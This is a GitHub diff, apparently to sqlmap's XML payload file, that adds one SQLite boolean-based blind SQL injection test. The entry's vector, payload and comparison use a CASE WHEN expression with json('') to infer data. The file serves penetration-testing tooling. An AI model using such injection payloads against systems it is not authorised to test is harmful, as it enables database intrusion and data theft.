File tree Expand file tree Collapse file tree 1 file changed +20
-0
lines changed Expand file tree Collapse file tree 1 file changed +20
-0
lines changed Original file line number Diff line number Diff line change @@ -596,6 +596,26 @@ Tag: <test>
596
596
<dbms >Oracle</dbms >
597
597
</details >
598
598
</test >
599
+
600
+ <test >
601
+ <title >SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (json)</title >
602
+ <stype >1</stype >
603
+ <level >1</level >
604
+ <risk >1</risk >
605
+ <clause >1</clause >
606
+ <where >1</where >
607
+ <vector >AND CASE WHEN [INFERENCE] THEN 1 ELSE json('') END </vector >
608
+ <request >
609
+ <payload >AND CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE json('') END</payload >
610
+ </request >
611
+ <response >
612
+ <comparison >AND CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE json('') END</comparison >
613
+ </response >
614
+ <details >
615
+ <dbms >SQLite</dbms >
616
+ </details >
617
+ </test >
618
+
599
619
<!-- End of boolean-based blind tests - WHERE or HAVING clause -->
600
620
601
621
<!-- Boolean-based blind tests - Parameter replace -->
You can’t perform that action at this time.
0 commit comments